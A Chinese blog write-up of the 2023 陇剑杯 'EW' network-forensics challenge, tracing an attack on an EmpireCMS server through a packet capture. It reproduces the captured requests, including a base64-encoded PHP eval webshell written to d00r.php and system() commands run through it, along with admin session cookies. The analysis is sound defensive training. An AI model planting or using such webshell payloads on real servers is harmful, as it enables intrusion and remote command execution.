2023陇剑杯EW-Write Up

已于 2023-08-28 22:57:54 修改
阅读量1.6k 收藏 2
点赞数
文章标签: 网络 http wireshark 网络安全 tcpdump 网络协议 tcp/ip
于 2023-08-28 17:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41247797/article/details/132542517
版权

附件地址:链接:https://caiyun.139.com/m/i?125Ce4UIWFs84
提取码:HY3O

1、服务器自带的后门文件名是什么?(含文件后缀)

解题步骤

过滤出http协议的流量包,追踪tcp流,在流10062中发现写入了d00r.php,故预留的后门为ViewMore.php

1693207878_64ec4d460eefa878d84dd.png!small?1693207873868

GET /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

POST /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/ViewMore.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

GET / HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:43 GMT
Content-Type: text/html
Last-Modified: Sun, 17 Apr 2022 10:37:13 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"625bedd9-2b98"
Content-Encoding: gzip

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>........................ - Powered by EmpireCMS</title>
<meta name="keywords" content="........................,EmpireCMS" />
<meta name="description" content="..................................................................................................................(EmpireCMS).......................................CMS..................................................................................................................EmpireCMS.............................................................................................................................................................................................CMS........." />
<link href="/skin/default/css/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/skin/default/js/tabs.js"></script>
</head>
<body class="homepage">
<!-- ...... -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="top">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="63%"> 
<!-- ...... -->
<script>
document.write('<script src="/e/member/login/loginjs.php?t='+Math.random()+'"><'+'/script>');
</script>
</td>
<td align="right">
<a onclick="window.external.addFavorite(location.href,document.title)" href="#ecms">............</a> | <a onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('/')" href="#ecms">............</a> | <a href="/e/member/cp/">............</a> | <a href="/e/DoInfo/">............</a> | <a href="/e/web/?type=rss2&classid=0" target="_blank">RSS<img src="/skin/default/images/rss.gif" border="0" hspace="2" /></a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="10">
<tr valign="middle">
<td width="240" align="center"><a href="/"><img src="/skin/default/images/logo.gif" width="200" height="65" border="0" /></a></td>
<td align="center"><a href="http://www.phome.net/OpenSource/" target="_blank"><img src="/skin/default/images/opensource.gif" width="100%" height="70" border="0" /></a></td>
</tr>
</table>
<!-- ......tab......... -->
<table width="920" border="0" align="center" cellpadding="0" cellspacing="0" class="nav">
  <tr> 
    <td class="nav_global"><ul>
        <li class="curr" id="tabnav_btn_0" onmouseover="tabit(this)"><a href="/">......</a></li>
         </ul></td>
  </tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr valign="top">
<td class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
</ul>
</td>
</tr>
</table></td>
<td class="content"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
          <td> 
            <!-- ............................................................... -->
            <script type="text/javascript">
<!--
 var interval_time=3;
 var focus_width=450;
 var focus_height=250;
 var text_height=0;
 var text_align="center";
 var swf_height = focus_height+text_height;
 var swfpath="/e/data/images/pixviewer.swf";
 var swfpatha="/e/data/images/pixviewer.swf";
 
 var pics="";
 var links="";
 var texts="";
 
 document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="'+ focus_width +'" height="'+ swf_height +'">');
 document.write('<param name="movie" value="'+swfpath+'"><param name="quality" value="high"><param name="bgcolor" value="#ffffff">');
 document.write('<param name="menu" value="false"><param name=wmode value="opaque">');
 document.write('<param name="FlashVars" value="pics='+pics+'&links='+links+'&texts='+texts+'&borderwidth='+focus_width+'&borderheight='+focus_height+'&textheight='+text_height+'&text_align='+text_align+'&interval_time='+interval_time+'">');
 document.write('<embed src="'+swfpath+'" wmode="opaque" FlashVars="pics='+pics+'&links='+links+'&texts='+texts+'&borderwidth='+focus_width+'&borderheight='+focus_height+'&textheight='+text_height+'&text_align='+text_align+'&interval_time='+interval_time+'" menu="false" bgcolor="#ffffff" quality="high" width="'+ focus_width +'" height="'+ swf_height +'" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
 document.write('</object>');
//-->
</script>
 </td>
</tr>
</table>
<!-- .................. -->
<table width="100%" border="0" cellspacing="8" cellpadding="0" class="focus">
<tr>
<td></td>
</tr>
<tr>
<td align="center"></td>
</tr>
</table></td>
<td class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box no_doc">
<tr>
<td><ul>
</ul></td>
</tr>
</table></td>
</tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
    <td align="center" class="banner_ad"><a href="http://www.phome.net/ebak2008/" target="_blank" title=".................."><img src="/skin/default/images/empirebak.gif" width="920" height="90" border="0" /></a></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr valign="top">
<td width="230" class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong><a href="/info/">............</a></strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
</ul></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong><a href="/download/">............</a></strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box no_doc">
<tr>
<td><ul>
               
            </ul></td>
</tr>
</table></td>
<td class="content"><!-- tab............................................................onmouseover......onclick -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tbtn1">
<tr>
<td class="tbtncon"><ul><li class="curr" id="tab1_btn_0" onmouseover="etabit(this)">......</li><li id="tab1_btn_1" onmouseover="etabit(this)">......</li><li id="tab1_btn_2" onmouseover="etabit(this)">......</li><li id="tab1_btn_3" onmouseover="etabit(this)">FLASH</li></ul></td>
</tr>
<tr>
<td class="picList"><div id="tab1_div_0">  
            </div>
            <div id="tab1_div_1" style="display:none;">  
            </div>
            <div id="tab1_div_2" style="display:none;">  
            </div>
            <div id="tab1_div_3" style="display:none;">  
            </div></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="box">
<tr valign="top">
<td width="50%"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="news_title">
<tr>
                <td>......ID=<b>34</b>...............(............=2) </td>
</tr>
</table>
<ul>
              ......ID=<b>34</b>...............(............=0) 
            </ul></td>
<td width="50%"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="news_title">
<tr>
                <td>......ID=<b>35</b>...............(............=2)</td>
</tr>
</table>
<ul>
              ......ID=<b>35</b>...............(............=0) 
            </ul></td>
</tr>
</table></td>
<td width="240" class="sider"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="title">
<tr>
<td><strong>............</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ol class="rank">
 
</ol></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="title margin_top">
<tr>
<td><strong>..................</strong></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="box">
<tr>
<td><ul>
 
</ul></td>
</tr>
</table></td>
</tr>
</table>
<!-- ............ -->
<table width="100%" border="0" cellspacing="10" cellpadding="0" class="links">
<tr>
<td><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#E9F2FB" class="title">
<tr>
<td><strong>............</strong></td>
          <td align="right">&nbsp;</td>
</tr>
</table>
<table width="100%" border="0" cellspacing="10" cellpadding="0" class="box">
<tr>
          <td>
            <!-- ............ -->
             
            <hr width="100%" size="1" noshade="noshade" />
            <!-- logo...... -->
            </td>
</tr>
</table></td>
</tr>
</table>
<!-- ...... -->
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" class="search">
<form action="/e/search/index.php" method="post" name="searchform" id="searchform">
<table border="0" cellspacing="6" cellpadding="0">
<tr>
<td><strong>...............</strong>
<input name="keyboard" type="text" size="32" id="keyboard" class="inputText" />
<input type="hidden" name="show" value="title" />
<input type="hidden" name="tempid" value="1" />
<select name="tbname">
<option value="news">......</option>
<option value="download">......</option>
<option value="photo">......</option>
<option value="flash">FLASH</option>
<option value="movie">......</option>
<option value="shop">......</option>
<option value="article">......</option>
<option value="info">............</option>
</select>
</td>
<td><input type="image" class="inputSub" src="/skin/default/images/search.gif" />
</td>
<td><a href="/search/" target="_blank">............</a></td>
</tr>
</table>
</form>
</td>
</tr>
<tr>
<td>
	<table width="100%" border="0" cellpadding="0" cellspacing="4" class="copyright">
        <tr> 
          <td align="center"><a href="/">............</a> | <a href="#">............</a> 
            | <a href="#">............</a> | <a href="#">............</a> | <a href="#">............</a> 
            | <a href="#">............</a> | <a href="#">............</a> | <a href="/e/wap/" target="_blank">WAP</a></td>
        </tr>
        <tr> 
          <td align="center">Powered by <strong><a href="http://www.phome.net" target="_blank">EmpireCMS</a></strong> 
            <strong><font color="#FF9900">7.5</font></strong>&nbsp; &copy; 2002-2018 
            <a href="http://www.digod.com" target="_blank">EmpireSoft Inc.</a></td>
        </tr>
	</table>
</td>
</tr>
</table>
</body>
</html>
flag{ViewMore.php}

2、服务器的内网IP是多少?

解题步骤

通过第一问发现写入的一句话木马参数为cmd,通过过滤post提交方法的包以及包含cmd字符串的http包,发现执行了ipconfig命令

1693207918_64ec4d6e205d8d2cbbcc1.png!small?1693207914203

追踪http流发现内网ip

1693207938_64ec4d82b604dc6da7f81.png!small?1693207934803

请求包
POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=system%28%27ifconfig%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:44:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

br-2fc7bfd07160: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:42:7b:5a:86:ea  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:42:b9:e3:56:83  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.162.130  netmask 255.255.255.0  broadcast 192.168.162.255
        inet6 fe80::ae06:234d:1e0a:9aac  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:08:04:89  txqueuelen 1000  (Ethernet)
        RX packets 397410  bytes 398085633 (398.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 140095  bytes 20078864 (20.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.101.132  netmask 255.255.255.0  broadcast 192.168.101.255
        inet6 fe80::68af:1a5:a54c:7366  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:08:04:93  txqueuelen 1000  (Ethernet)
        RX packets 362  bytes 35928 (35.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1654  bytes 141760 (141.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 7070  bytes 3169973 (3.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7070  bytes 3169973 (3.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
flag{192.168.101.132}

3、攻击者往服务器中写入的key是什么?

解题步骤

如上第二问的过滤规则,发现file_put_contents写入内容

1693207960_64ec4d9828f31085eb105.png!small?1693207956195

进行代码进行解码

请求包

POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=file_put_contents%28%27k3y_f1le%27%2C+base64_decode%28%27UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl%2FO%2FAJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI%2FABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

1693207979_64ec4dabc06f4a6fb0190.png!small?1693207975446

利用python将解密的文件写入zip中

python代码如下:

import base64
with open('1.txt','r') as f:
    text=f.read()
    text_bs64_decode=base64.b64decode(text)
    with open ('1.zip','wb') as f:
        f.write(text_bs64_decode)

解码发现为zip压缩包,故另存为zip

追踪流10098发现密码

1693208008_64ec4dc8de090b13a3520.png!small?1693208004770

请求包:

7e03864b0db7e6f9POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=system%28%27ls+%2Fwww%2Fwwwroot%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

cms.com
default
www.1.com

利用7e03864b0db7e6f9进行解密得到key值

1693208031_64ec4ddf0b7f258663df5.png!small?1693208026824

flag{7d9ddff2-2d67-4eba-9e48-b91c26c42337}
KD_du
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EDIMAX EW-7611UCB EW-7822UAC EW-7833UAC等USB无线网卡(12款)LINUX系统驱动
04-21
EDIMAX EW-7611UCB EW-7822UAC EW-7833UAC等USB无线网卡(12款)LINUX系统驱动: 型号如下: EW-7611UCB EW-7611ULB EW-7811DAC EW-7811UAC EW-7811UN EW-7811UN V2 EW-7811UTC EW-7822UAC EW-7822UAN EW-7822ULC EW...
MSF:Web 后门
weixin_46104215的博客
11-21 1812
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
[GKCTF 2021]easycms Writeup ——蝉知7.7
Leaf_initial的博客
07-07 510
由于是个CVE,就自己找了找还有没有别的打法,跟着别的师傅的打法又打了一遍。是一个静态网页,点啥都没有用(除了友链),用dirsearch扫一下。一开始想通过文件上传来打的,但是一直上传失败,只能换一种方法。点击保存后,会给我们下载一个文件,将该文件的下载链接复制下来。最后那个txt名称为之前修改模板提示的文件,剩下的随便输。是经过base64加密后的密文,将他解码得到。然后去设置中的微信设置,随便写点东西然后保存。下载后是个压缩包,将文件扩展名改成。,将theme后面的内容改成将。,OK,寄了,打不了。
ctfshow CMS系列writeup(web477-web479)
身高两米不到的博客
01-25 4930
0x01 Web 477 打开页面发现是CmsEasy建站系统,题目提示RCE,百度寻找dms对应相关漏洞,多方查找后发现版本是v5.7,找到对应版本后进行搜索就很简单。 找登录后台,/admin进入登录窗,然后小手一敲弱口令admin:admin进入后台,有点沙雕....... 这里忘记密码好像是存在洞的,重置完默认账号密码才会是admin:admin,这里记不清楚了,有兴趣的童鞋可以找找。 CmsEasy_v5.7 漏洞测试 - 云+社区 - 腾讯云 漏洞点在于模板-自定义标签部分,使.
2023第二届陇剑杯wp(ak)
Ahi0upsec的博客
08-28 2484
ak数据分析部分wp。
2023陇剑杯
最新发布
qq_64201116的博客
09-18 1010
​首先判断哪个是服务器地址​从响应包看,给客户端返回数据包的就是服务器所以确定服务器地址是​再从开放端口来看,长期开放的端口​所以就是80、888、8888。
2021年“陇剑杯“部分WP
mwmbfh的博客
09-15 1852
2021年"陇剑杯"部分WP一、 战队信息二、 解题情况三、 解题过程题目3.1题目3.1操作内容题目3.1flag值题目7.1题目7.1操作内容题目7.1flag值题目8.1题目8.1操作内容题目8.1flag值题目8.2题目8.2操作内容题目8.2flag值题目8.3题目8.3操作内容题目8.2flag值 一、 战队信息 战队名称:fuller 二、 解题情况 三、 解题过程 题目3.1 题目3.1操作内容 使用wireshark打开题目文件,使用筛选条件,选择发送的数据。 Ø
云服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程
06-30 5170
云服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
AGCTF 2023陇剑杯wp
akxnxbshai的博客
09-01 722
前几天的比赛,有空发一下。
易往信息EW-WMS仓库管理系统.pdf
08-05
易往信息EW-WMS仓库管理系统.pdf
ew-color-picker:一个基于原生js实现的颜色选择器
04-18
ew-color-picker 一个基于原生js而封装的颜色选择器插件。 安装与使用 安装 npm install ew-color-picker --save-dev 引入 [removed][removed] 颜色选择器插件如下: //默认配置 var color = new ewColorPicker('...
CD-EW8051-8103
02-03
用DOS命令,切换到下面目录..\BLE 开发资料\IAR 安装及破解方法\IAR 8051 注册机.
Edimax EW-7811UTC USB wifi Adapter linux driver
10-31
Ubuntu18.04亲测可用。 解压后执行 make make install 再插上USB设备,重启即可找到wifi设备
EW-7822UAC_无线网卡驱动
08-15
适用于EDIMAX EW-7822UAC WiFi双频无线网卡1200M接收器Win10网卡抓包 电脑网卡 8812AU芯片
EW-7822UAC驱动.rar
03-29
附件包括官网wifi网卡驱动,和抓包专用驱动。win10 64位亲测可以,抓包工具使用omnipeek,更新成抓包用驱动需要禁用windows 数字签名验证(可找度娘解决,重启禁用签名)后可正常抓802.11包
第二届“陇剑杯网络安全大赛线上赛write up2023
m0_52484587的博客
09-01 3323
题目内容:服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了80 81 82 83端口,则答案为80,81,82,83)过滤器:ip.dst == 192.168.162.188 and tcp.connection.synack。
2023陇剑杯SSW部分题目WP
qq_41247797的博客
08-28 494
陇剑杯数据分析题目,考察从流量包分析黑客入侵的过程
CTF - 第二届“陇剑杯网络安全大赛线上赛部分write up
HengMengSec的博客
08-26 397
CTF - 第二届“陇剑杯网络安全大赛线上赛部分write up
陇剑杯2021(一)
wha1e的博客
06-27 1712
陇剑杯2021(一)
ew-shot Learning
05-11
Few-shot learning is a type of machine learning where a model is trained to recognize new objects or concepts based on only a few examples. Traditional machine learning models require a large amount ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值